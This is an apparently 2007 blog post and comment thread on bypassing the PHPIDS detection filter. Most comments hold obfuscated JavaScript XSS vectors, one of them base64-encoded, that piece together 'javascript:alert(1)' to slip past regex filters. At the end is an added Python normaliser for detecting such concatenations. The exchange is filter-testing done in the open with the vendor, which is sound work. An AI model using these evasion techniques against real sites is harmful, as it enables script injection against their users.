So you think you’re a hacker?

I’ve been testing PHPIDS after Sirdarckcat tempted me with his post :) At first I created two simple vectors to make injection more difficult; then I spent a couple of hours coming up with a full tag and JavaScript injection. I shall post the vector here once they have fixed it, because it is quite dangerous and I don’t want their site open to attack. So if you think you are a good hacker, try and inject some JavaScript on their smoke test; it isn’t as easy as it first looks.

Prove it


Comments 21

  1. Gareth Heyes wrote:

    I’ve found another serious one. I’ll share when it’s fixed. Here’s the other one I did which has now been fixed:-

    s1=0?'':'i';s2=0?'':'fr';s3=0?'':'ame';i1=s1+s2+s3;s1=0?'':'jav';s2=0?'':'ascr';s3=0?'':'ipt';s4=0?'':':';s5=0?'':'ale';s6=0?'':'rt';s7=0?'':'(1)';i2=s1+s2+s3+s4+s5+s6+s7;i=createElement(i1);i.src=i2;x=parentNode;x.appendChild(i);

    Posted 04 Sep 2007 at 12:30 pm
  2. .mario wrote:

    Hi!

    Great work again - thx a lot! It led me to refactor the converter unit of the PHPIDS and I think I have found a pretty stable beta of the regex to check and de-assemble concatenations.

    I am very much looking forward to the 0.4.0 release we are currently working on - the help of you guys is what helps improve it eminently.

    Greetz,
    .mario

    Posted 04 Sep 2007 at 2:57 pm
  3. Gareth Heyes wrote:

    This is also fixed now:-
    s1=''+'java'+''+'scr'+'';s2=''+'ipt'+':'+'ale'+'';s3=''+'rt'+''+'(1)'+'';
    u1=s1+s2+s3;URL=u1

    Posted 04 Sep 2007 at 2:58 pm
  4. Gareth Heyes wrote:

    Good work Mario/PHPIDS team, I really admire all your efforts on this because I know how difficult it is to protect against this stuff.

    I’ll look forward to hacking it again though ;)

    Posted 04 Sep 2007 at 3:01 pm
  5. .mario wrote:

    always appreciated!

    Posted 04 Sep 2007 at 3:46 pm
  6. Ronald wrote:

    It almost looks like ASCII art, good job! :)

    Posted 04 Sep 2007 at 11:28 pm
  7. Gareth Heyes wrote:

    Hehe thanks :)

    I might try again soon cause I love an interesting challenge

    Posted 05 Sep 2007 at 12:28 am
  8. Gareth Heyes wrote:

    Found another one (IE only):-
    I’ve had to base64 encode it because it causes conversion errors:-
    czE9IScnJiYnamF2JztzMj0hJycmJidhc2NyaXB0JztzMz0hJycmJic6JztzND0hJycmJidhbGVy
    JztzNT0hJycmJid0JztzNj0hJycmJicoMSknO3M3PXMxK3MyK3MzK3M0K3M1K3M2O1VSTD1zNzs=

    Posted 05 Sep 2007 at 4:50 am
  9. Gareth Heyes wrote:

    and another:-
    s1=''+"jav"+'';s2=''+"ascri"+'';s3=''+"pt"+'';s4=''==''?':':0;s5=''+"aler"+'';s6=''+"t"+'';s7=''==''?'(1)':0;s8=s1+s2+s3+s4+s5+s6+s7;URL=s8

    Posted 06 Sep 2007 at 9:04 am
  10. Ronald wrote:
    for(i=0;i<Number.MAX_VALUE;++i) { i+i; }
    Posted 07 Sep 2007 at 3:08 pm
  11. Gareth Heyes wrote:

    Check this one out: it creates javascript: and passes it to the URL property; only works in IE though.

    s3=1==true&&':';s2=1==true&&'(1)';s1=1==true&&'javascript'+s3+'aler'+'t'+s2;URL=s1
    Posted 08 Sep 2007 at 10:25 am
  12. Gareth Heyes wrote:

    Here’s my favorite:-

    x=(this);c=1==1&&':';s=''+/javascriptaaalerta(1)ahrefa/|>+'';j=s[1]+s[2]+s[3]+s[4]+s[5]+s[6]+s[7]+s[8]+s[9]+s[10]+c+s[12]+s[14]+s[15]+s[16]+s[17]+s[19]+s[20]+s[21];h=s[23]+s[24]+s[25]+s[26];x[h]=j
    Posted 08 Sep 2007 at 6:43 pm
  13. Ronald wrote:

    Yeah I think this will be an endless arms race :D

    btw do you know the Javascript functions:

    import() and export()? It’s pretty cool cause you can export signed script data if import is called inside a signed script. I didn’t know this; there is a lot more to be learned in Javascript.

    Posted 08 Sep 2007 at 10:45 pm
  14. Gareth Heyes wrote:

    Nope didn’t know that but sounds cool, I’m gonna google it.

    Posted 09 Sep 2007 at 9:03 am
  15. Gareth Heyes wrote:
    c4=1==1&&'(1)';c3=1==1&&'aler';
    c2=1==1&&':';c1=1==1&&'javascript';
    a=c1+c2+c3+'t'+c4;(URL=a);
    Posted 09 Sep 2007 at 6:31 pm
  16. Gareth Heyes wrote:

    Definitely an arms race, I just can’t see how they can prevent all of it because we can always come up with new ways of doing things.

    Still, I’m impressed with their filters; it isn’t that easy to come up with new vectors, and I’ve done loads of complicated ones which don’t get through.

    Posted 09 Sep 2007 at 6:42 pm
  17. Ronald wrote:

    I meant:

    import function() or var

    export function() or var

    Like:

    function a() {
      //foo
    }
    export a;

    misleading stuff I know :)

    Posted 09 Sep 2007 at 9:05 pm
  18. Gareth Heyes wrote:

    Found any docs on that? I would be interested to read, I tried Mozilla but there’s not much stuff on it.

    Posted 09 Sep 2007 at 9:42 pm
  19. Ronald wrote:

    It is here:

    http://devedge-temp.mozilla.org/library/manuals/2000/javascript/1.3/guide/sec.html

    Be amazed what the ol’ Netscape can teach us; it’s almost forbidden knowledge. I read the whole book over the weekend and learned tons of new and old stuff.

    :D

    Posted 10 Sep 2007 at 1:50 am
  20. Gareth Heyes wrote:

    This one’s awesome :D
    _=alert,1,1,_(1);

    Posted 11 Sep 2007 at 10:09 am
  21. Gareth Heyes wrote:

    This one took ages cause it’s really tough now with their new filters:-

    s=function test2() {return 'hrefjavascriptalert(1)a';1,1}();
    void(a = {} );
    void(c = URL );
    a.c=function xyz() {return c[4] }();
    a.h1=function xyz() {return s[0] }();
    a.h2=function xyz() {return s[1] }();
    a.h3=function xyz() {return s[2] }();
    a.h4=function xyz() {return s[3] }();
    a.u1=function xyz() {return s[4] }();
    a.u2=function xyz() {return s[5] }();
    a.u3=function xyz() {return s[6] }();
    a.u4=function xyz() {return s[7] }();
    a.u5=function xyz() {return s[8] }();
    a.u6=function xyz() {return s[9] }();
    a.u7=function xyz() {return s[10] }();
    a.u8=function xyz() {return s[11] }();
    a.u9=function xyz() {return s[12] }();
    a.u10=function xyz() {return s[13] }();
    a.u11=function xyz() {return s[14] }();
    a.u12=function xyz() {return s[15] }();
    a.u13=function xyz() {return s[16] }();
    a.u14=function xyz() {return s[17] }();
    a.u15=function xyz() {return s[18] }();
    a.u16=function xyz() {return s[19] }();
    a.u17=function xyz() {return s[20] }();
    a.u18=function xyz() {return s[21] }();
    $_=function xyz() {return a.u1 + a.u2 + a.u3 + a.u4 + a.u5 + a.u6 + a.u7 + a.u8 + a.u9 + a.u10 + a.c + a.u11 + a.u12 + a.u13 + a.u14 + a.u15 + a.u16 + a.u17 + a.u18 }();
    for(i in x=this) x[a.h1+a.h2+a.h3+a.h4]=$_;

    Posted 18 Sep 2007 at 1:34 am
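As an added example (not code from the post, the commenters, or the PHPIDS project), the Python sketch below shows the defensive idea behind .mario's converter refactor in comment 2: fold constant-condition tricks, drop empty-string joins, merge adjacent literals and inline variables that hold one literal, then run the detection regex over the normalised text instead of the raw input. The sample vectors are constructed here to mirror the concatenation patterns of comments 1, 3 and 11; the folding rules are a toy of my own, not PHPIDS's actual converter.

```python
import re

# Constructed samples modelled on the vectors posted in this thread: each one
# assembles "javascript:alert(1)" from fragments so a regex that looks for the
# contiguous strings "javascript:" or "alert(" never matches the raw input.
SAMPLES = {
    "empty_joins": "s1=''+'java'+''+'scr'+'';s2=''+'ipt'+':'+'ale'+'';"
                   "s3=''+'rt'+''+'(1)'+'';u1=s1+s2+s3;URL=u1",
    "ternary": "s1=0?'':'jav';s2=0?'':'ascr';s3=0?'':'ipt';s4=0?'':':';"
               "s5=0?'':'ale';s6=0?'':'rt';s7=0?'':'(1)';i2=s1+s2+s3+s4+s5+s6+s7;",
    "and_chain": "s3=1==true&&':';s2=1==true&&'(1)';"
                 "s1=1==true&&'javascript'+s3+'aler'+'t'+s2;URL=s1",
    "benign": "greeting='Hello, '+name+'!';",
}

LIT = r"'([^']*)'"  # one single-quoted literal, no escapes (enough for these vectors)
SUSPICIOUS = re.compile(r"javascript\s*:|alert\s*\(", re.IGNORECASE)

def fold_constants(code):
    """N?'a':'b' with numeric N -> the branch taken; 1==1&&'x' / 1==true&&'x' -> 'x'."""
    code = re.sub(r"\b(\d+)\?" + LIT + ":" + LIT,
                  lambda m: "'%s'" % (m.group(2) if int(m.group(1)) else m.group(3)), code)
    return re.sub(r"\b1==(?:1|true)&&(?=')", "", code)

def merge_literals(code):
    """Drop ''+ and +'' (they add nothing) and join neighbouring literals until stable."""
    prev = None
    while prev != code:
        prev = code
        code = re.sub(r"''\+|\+''", "", code)
        code = re.sub(LIT + r"\+" + LIT, lambda m: "'%s%s'" % (m.group(1), m.group(2)), code)
    return code

def inline_assignments(code):
    """Substitute variables holding one literal into later uses (skipping the defining
    `name=`, property names `.name`, and text inside literals), then re-merge."""
    prev = None
    while prev != code:
        prev = code
        for name, value in re.findall(r"\b(\w+)=" + LIT + ";", code):
            repl = "'%s'" % value
            code = re.sub(r"(?<![\w.'])" + re.escape(name) + r"\b(?!=)", lambda m: repl, code)
        code = merge_literals(code)
    return code

def normalise(code):
    return inline_assignments(merge_literals(fold_constants(code)))

def flagged(code):
    """(detector hit on the raw input, detector hit after normalisation)."""
    return bool(SUSPICIOUS.search(code)), bool(SUSPICIOUS.search(normalise(code)))
```

The regex-literal character-indexing vector in comment 12 and the property-write loop in comment 21 are not folded by these rules, so a normaliser like this narrows the gap rather than closing it, which is the arms race Ronald describes.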
